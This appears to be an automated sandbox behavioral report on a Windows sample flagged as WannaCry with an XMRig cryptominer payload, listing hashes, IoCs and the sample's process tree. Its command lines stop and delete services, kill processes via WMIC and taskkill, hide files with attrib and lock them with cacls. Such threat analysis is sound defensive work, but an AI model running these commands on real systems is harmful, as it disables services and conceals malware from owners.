Analysis
- max time kernel: 203s
- max time network: 210s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 08-07-2022 01:50
Behavioral task: behavioral1
- Sample: 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
- Resource: win7-20220414-en
General
- Target: 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
- Size: 2.3MB
- MD5: 7b4f33a283fc64db1227f5d82db91a59
- SHA1: f32ae945c419e09e3320686f2b9b419c346d76a3
- SHA256: 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a
- SHA512: 7c59bc1028115acbda27245a8f14638892a3fbae1ac409ec62448f9ad580fd3051bdaef751b7d8f6e81df80a23098201de386082e229a768a6142a514ee85511
Malware Config
Signatures
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Detected Stratum cryptominer command 2 IoCs
Looks to be attempting to contact Stratum mining pool.
Processes:
- pid 5092 svchost.exe
- pid 3540 KvMonXP.exe
-
XMRig Miner payload 5 IoCs
Processes:
- behavioral2/memory/4288-130-0x0000000000400000-0x0000000000656000-memory.dmp (yara rule: xmrig)
- C:\Windows\Fonts\lsass.exe (yara rule: xmrig)
- \??\c:\windows\Fonts\lsass.exe (yara rule: xmrig)
- C:\Windows\Fonts\KvMonXP.exe (yara rule: xmrig)
- \??\c:\windows\Fonts\KvMonXP.exe (yara rule: xmrig)
-
Executes dropped EXE 12 IoCs
Processes:
- pid 1824 svchost.exe
- pid 1732 svchost.exe
- pid 2444 svchost.exe
- pid 2088 svchost.exe
- pid 4120 svchost.exe
- pid 3296 lsass.exe
- pid 5092 svchost.exe
- pid 3684 svchost.exe
- pid 1844 svchost.exe
- pid 3104 svchost.exe
- pid 1132 svchost.exe
- pid 3540 KvMonXP.exe
-
Modifies Windows Firewall 1 TTPs 4 IoCs
Processes:
- netsh.exe, pids: 3672, 3152, 3504, 3472
-
Sets file to hidden 1 TTPs 7 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
- attrib.exe, pids: 4396, 1252, 2124, 4084, 3968, 4324, 2752
-
Stops running service(s) 3 TTPs
-
Processes:
- C:\Windows\Fonts\svchost.exe (yara rule: upx), 10 hits
- \??\c:\windows\Fonts\svchost.exe (yara rule: upx)
- behavioral2 memory dumps matching the upx rule, all at 0x0000000140000000-0x0000000140053000: 1824-187, 1732-188, 2088-190, 2444-189, 1824-195, 1732-207, 2444-209, 4120-210, 5092-218, 5092-220, 3684-219, 1844-222, 2088-225, 1132-226, 3104-227, 4120-228, 1132-229 (each of the form behavioral2/memory/<pid>-<n>-0x0000000140000000-0x0000000140053000-memory.dmp)
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
- Key value queried: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation (by 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe)
-
Drops file in Windows directory 64 IoCs
Processes:
- File opened for modification C:\Windows\Fonts (by attrib.exe), repeated 58 times, accounting for the remaining IoCs of the 64 listed
- File opened for modification C:\Windows\tasksche.exe (by attrib.exe)
- File opened for modification C:\windows\debug\services.exe (by attrib.exe)
- File created \??\c:\windows\hosts.bat (by 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe)
- File created \??\c:\windows\Fonts\svchost.exe (by 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe)
- File opened for modification C:\Windows\svchost.exe (by attrib.exe)
- File opened for modification \??\c:\windows\Fonts\svchost.exe (by 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe)
-
Launches sc.exe 64 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
- sc.exe, pids: 4836, 2260, 3684, 4216, 744, 2112, 3480, 5024, 4716, 3520, 3852, 2708, 4624, 3100, 4492, 4084, 3132, 2412, 3804, 4140, 4680, 4524, 1184, 2180, 2428, 4060, 3436, 3404, 4168, 5064, 3604, 4676, 4512, 4484, 1004, 4396, 752, 4800, 4656, 4172, 3880, 1484, 4996, 3464, 1924, 1980, 2544, 5108, 344, 4504, 3776, 2832, 4688, 3116, 2524, 2984, 2832, 4656, 4892, 3476, 1924, 3828, 3940, 1096
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with WMI 23 IoCs
Processes:
- WMIC.exe, pids: 1492, 4184, 4656, 3144, 3540, 460, 2164, 2892, 4940, 4252, 2300, 4952, 4960, 4608, 1596, 3992, 4764, 3636, 2476, 1652, 4544, 4228, 1812
-
Kills process with taskkill 10 IoCs
Processes:
- taskkill.exe, pids: 4440, 1728, 1828, 3036, 4960, 4056, 1916, 4980, 2336, 1512
-
Modifies registry class 1 IoCs
Processes:
- Key created: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings (by 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe)
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
- pid 3296 lsass.exe (listed 64 times)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
- WMIC.exe (pid 3144), tokens adjusted: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (this 21-entry sequence is listed twice)
- KvMonXP.exe (pid 3540), tokens adjusted: the same 21-entry sequence, followed by one further SeIncreaseQuotaPrivilege
-
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
- pid 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe (listed twice)
- pid 3296 lsass.exe (listed twice)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
- PID 4288 (42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe) wrote to the memory of each of the following target processes, three times each: 4232 cmd.exe, 4244 net.exe, 4168 sc.exe, 4504 sc.exe, 4860 net.exe, 4524 sc.exe, 1512 net.exe, 2156 sc.exe, 1492 net.exe, 4680 sc.exe, 2476 net.exe, 5064 sc.exe, 4764 net.exe, 4512 sc.exe, 3024 net.exe, 4656 sc.exe, 4236 net.exe, 3636 sc.exe, 1812 net.exe, 3476 sc.exe, 3388 net.exe
- PID 4232 (cmd.exe) wrote to the memory of 2700 attrib.exe
-
Views/modifies file attributes 1 TTPs 64 IoCs
Processes:
- attrib.exe, pids: 2568, 2360, 2548, 3444, 3472, 2868, 2948, 3616, 4140, 4164, 3692, 680, 2716, 220, 3912, 4628, 1540, 2744, 652, 2788, 3188, 3144, 4184, 3476, 4160, 4212, 4492, 3952, 4324, 2124, 4084, 1176, 4844, 3544, 3652, 4172, 4000, 2964, 3248, 216, 4264, 2232, 3756, 4600, 4212, 1536, 4800, 4660, 4164, 3952, 2076, 2752, 4108, 2348, 2248, 4020, 3556, 1252, 4216, 2304, 3696, 2656, 3192, 1300
Processes
-
C:\Users\Admin\AppData\Local\Temp\42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe"C:\Users\Admin\AppData\Local\Temp\42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe"1⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts3⤵
-
C:\Windows\SysWOW64\net.exenet stop lanmanserver /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop lanmanserver /y3⤵
-
C:\Windows\SysWOW64\sc.exesc config lanmanserver start= DISABLED 2>nul2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete lanmanserver2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.02⤵
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.02⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.03⤵
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.12⤵
-
C:\Windows\SysWOW64\net.exenet stop ServiceSaims2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ServiceSaims3⤵
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.12⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.13⤵
-
C:\Windows\SysWOW64\net.exenet stop ServiceSais2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ServiceSais3⤵
-
C:\Windows\SysWOW64\sc.exesc delete ServiceSais2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete ServiceSaims2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop HostManger2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop HostManger3⤵
-
C:\Windows\SysWOW64\sc.exesc delete HostManger2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop Hostserver2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Hostserver3⤵
-
C:\Windows\SysWOW64\sc.exesc delete Hostserver2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop ServiceMaims2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ServiceMaims3⤵
-
C:\Windows\SysWOW64\sc.exesc delete ServiceMaims2⤵
-
C:\Windows\SysWOW64\net.exenet stop ServicesMain2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ServicesMain3⤵
-
C:\Windows\SysWOW64\sc.exesc delete ServicesMain2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop Famserver2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Famserver3⤵
-
C:\Windows\SysWOW64\sc.exesc delete Famserver2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete RpcEptManger2⤵
-
C:\Windows\SysWOW64\sc.exesc delete samserver2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop samserver2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop samserver3⤵
-
C:\Windows\SysWOW64\net.exenet stop WinNsaSrv2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinNsaSrv3⤵
-
C:\Windows\SysWOW64\sc.exesc delete WinNsaSrv2⤵
- Launches sc.exe
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set HostManger DisplayName HOST Endpoint Manger2⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start HostManger2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c c:\windows\hosts1.bat2⤵
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\SysWOW64\csrss.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\SysWOW64\rscheck.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\SysWOW64\checkrs.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\seser.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\seser.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='seser.exe' and ExecutablePath='C:\\Windows\\system32\\seser.exe'" call Terminate3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='seser.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\seser.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='rscheck.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\rscheck.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='checkrs.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\checkrs.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\vmicvess\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\ProgramData\vmicvess\svchost.exe3⤵
- Sets file to hidden
- Views/modifies file attributes
-
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\ProgramData\vmicvess\svchost.exe /p everyone:n /d system
[depth 3] C:\Windows\SysWOW64\Wbem\WMIC.exe -> wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\vmicvess\\csrss.exe'" call Terminate
- Kills process with WMI
[depth 3] C:\Windows\SysWOW64\attrib.exe -> attrib +s +h +r C:\ProgramData\Microsoft\vmicvess\csrss.exe
- Sets file to hidden
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\ProgramData\Microsoft\vmicvess\csrss.exe /p everyone:n /d system
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\Wbem\WMIC.exe -> wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\help\\svchost.exe'" call Terminate
- Kills process with WMI
[depth 3] C:\Windows\SysWOW64\Wbem\WMIC.exe -> wmic process where "name='SPOOLSV.exe' and ExecutablePath='C:\\windows\\help\\SPOOLSV.exe'" call Terminate
- Kills process with WMI
[depth 3] C:\Windows\SysWOW64\Wbem\WMIC.exe -> wmic process where "name='services.exe' and ExecutablePath='C:\\windows\\fonts\\help\\services.exe'" call Terminate
- Kills process with WMI
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\windows\fonts\help\services.exe /p everyone:n /d system
[depth 3] C:\Windows\SysWOW64\Wbem\WMIC.exe -> wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\fonts\\help\\svchost.exe'" call Terminate
- Kills process with WMI
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\windows\fonts\help\svchost.exe /p everyone:n /d system
[depth 3] C:\Windows\SysWOW64\Wbem\WMIC.exe -> wmic process where "name='conhost.exe' and ExecutablePath='C:\\windows\\temp\\conhost.exe'" call Terminate
- Kills process with WMI
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\windows\temp\conhost.exe /p everyone:n /d system
[depth 3] C:\Windows\SysWOW64\Wbem\WMIC.exe -> wmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\svchost.exe'" call Terminate
- Kills process with WMI
[depth 3] C:\Windows\SysWOW64\Wbem\WMIC.exe -> wmic process where "name='lsmose.exe' and ExecutablePath='C:\\Windows\\debug\\lsmose.exe'" call Terminate
- Kills process with WMI
[depth 3] C:\Windows\SysWOW64\attrib.exe -> attrib +s +h +r C:\Windows\debug\lsmose.exe
- Sets file to hidden
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\debug\lsmose.exe /p everyone:n /d system
[depth 3] C:\Windows\SysWOW64\Wbem\WMIC.exe -> wmic process where "name='spoolsv.exe' and ExecutablePath='C:\\Windows\\SpeechsTracing\\spoolsv.exe'" call Terminate
- Kills process with WMI
[depth 3] C:\Windows\SysWOW64\Wbem\WMIC.exe -> wmic process where "name='update.exe' and ExecutablePath='C:\\windows\\update.exe'" call Terminate
- Kills process with WMI
[depth 3] C:\Windows\SysWOW64\Wbem\WMIC.exe -> wmic process where "name='SRDSL.exe' and ExecutablePath='C:\\windows\\syswow64\\SRDSL.exe'" call Terminate
- Kills process with WMI
[depth 3] C:\Windows\SysWOW64\Wbem\WMIC.exe -> wmic process where "name='ClipBooks.exe' and ExecutablePath='C:\\windows\\syswow64\\ClipBooks.exe'" call Terminate
- Kills process with WMI
[depth 3] C:\Windows\SysWOW64\Wbem\WMIC.exe -> wmic process where "name='services.exe' and ExecutablePath='C:\\windows\\debug\\services.exe'" call Terminate
- Kills process with WMI
[depth 3] C:\Windows\SysWOW64\attrib.exe -> attrib +s +h +r C:\windows\debug\services.exe
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\windows\debug\services.exe /p everyone:n /d system
[depth 3] C:\Windows\SysWOW64\Wbem\WMIC.exe -> wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\debug\\svchost.exe'" call Terminate
- Kills process with WMI
[depth 3] C:\Windows\SysWOW64\attrib.exe -> attrib +s +h +r C:\windows\debug\svchost.exe
- Sets file to hidden
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\windows\debug\svchost.exe /p everyone:n /d system
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\ProgramData\Microsoft\vmicvess\csrss.exe /p everyone:n /d system
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\windows\syswow64\ClipBooks.exe /p everyone:n /d system
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\windows\syswow64\SRDSL.exe /p everyone:n /d system
[depth 3] C:\Windows\SysWOW64\Wbem\WMIC.exe -> wmic process where "name='taskhost.exe' and ExecutablePath='C:\\WINDOWS\\Fonts\\taskhost.exe'" call Terminate
- Kills process with WMI
[depth 3] C:\Windows\SysWOW64\Wbem\WMIC.exe -> wmic process where "name='services.exe' and ExecutablePath='C:\\WINDOWS\\Fonts\\services.exe'" call Terminate
- Kills process with WMI
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\WINDOWS\Fonts\taskhost.exe /p everyone:n /d system
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\WINDOWS\Fonts\services.exe /p everyone:n /d system
[depth 2] C:\Windows\SysWOW64\cmd.exe -> cmd /c c:\windows\hosts.bat
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop COMSysCts
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete COMSysCts
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop WmSrv
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete WmSrv
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop WmiAppSrv
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete WmiAppSrv
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop "RegCsv COMSysApp"
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete "RegCsv COMSysApp"
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop hasplms
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete hasplms
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop hasp1ms
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete hasp1ms
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop serviceing
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete serviceing
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop SQLWriter$
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete SQLWriter$
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop IPSECS
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete IPSECS
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop MicrosoftFonts
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete MicrosoftFonts
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop Microsoft_Update
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete Microsoft_Update
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop "Help Service"
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete "Help Service"
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop vmicvess
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete vmicvess
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop SSDPSRVS
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete SSDPSRVS
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop superproservert
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete superproservert
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop Bcdefg
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete Bcdefg
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop ctfnom
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete ctfnom
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop ClipBooks
[depth 3] C:\Windows\SysWOW64\net.exe -> net stop "MicrosoftFonts"
[depth 4] C:\Windows\SysWOW64\net1.exe -> C:\Windows\system32\net1 stop "MicrosoftFonts"
[depth 3] C:\Windows\SysWOW64\net.exe -> net stop MicrosoftFonts
[depth 4] C:\Windows\SysWOW64\net1.exe -> C:\Windows\system32\net1 stop MicrosoftFonts
[depth 3] C:\Windows\SysWOW64\net.exe -> net stop "Framework"
[depth 4] C:\Windows\SysWOW64\net1.exe -> C:\Windows\system32\net1 stop "Framework"
[depth 3] C:\Windows\SysWOW64\net.exe -> net stop Servicing
[depth 4] C:\Windows\SysWOW64\net1.exe -> C:\Windows\system32\net1 stop Servicing
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop cefragsvc
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete cefragsvc
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop Microsoft.NET_Framework_NGEN
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete Microsoft.NET_Framework_NGEN
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop natiodnal
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete natiodnal
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop wbzxqk
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete wbzxqk
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop hidserv
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete hidserv
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop NetASDlogon
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete NetASDlogon
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop "BITS lsm"
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete "BITS lsm"
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop endpointrpc
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete endpointrpc
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop "MYSQL Input Service Name"
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop csrss
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete "MYSQL Input Service Name"
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete csrss
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop gupdate
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete gupdate
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop gupdatem
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete gupdatem
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop wmiApSrvs
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete wmiApSrvs
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop snmpstorsrv
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete snmpstorsrv
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete "MicrosoftFonts"
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop serviceing
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete Servicing
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete MicrosoftFonts
[depth 3] C:\Windows\SysWOW64\taskkill.exe -> taskkill /f /t /im runhost.exe
- Kills process with taskkill
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc delete WmiAppSrv
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc stop WmiAppSrv
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\taskkill.exe -> taskkill /f /t /im rundllhost.exe
- Kills process with taskkill
[depth 3] C:\Windows\SysWOW64\taskkill.exe -> taskkill /f /t /im dlllhost.exe
- Kills process with taskkill
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\ProgramData\WmiAppSrv\svchost.exe /p everyone:n /d system
[depth 3] C:\Windows\SysWOW64\Wbem\WMIC.exe -> wmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\WmiAppSrv\\svchost.exe'" call Terminate
- Kills process with WMI
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\ProgramData\Microsoft\WmiAppSrv\csrss.exe /p everyone:n /d system
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\Wbem\WMIC.exe -> wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe'" call Terminate
- Kills process with WMI
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system\lsmsm.exe /p everyone:n /d system
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\mysql.log /p everyone:n /d system
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system\lsaus.exe /p everyone:n /d system
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
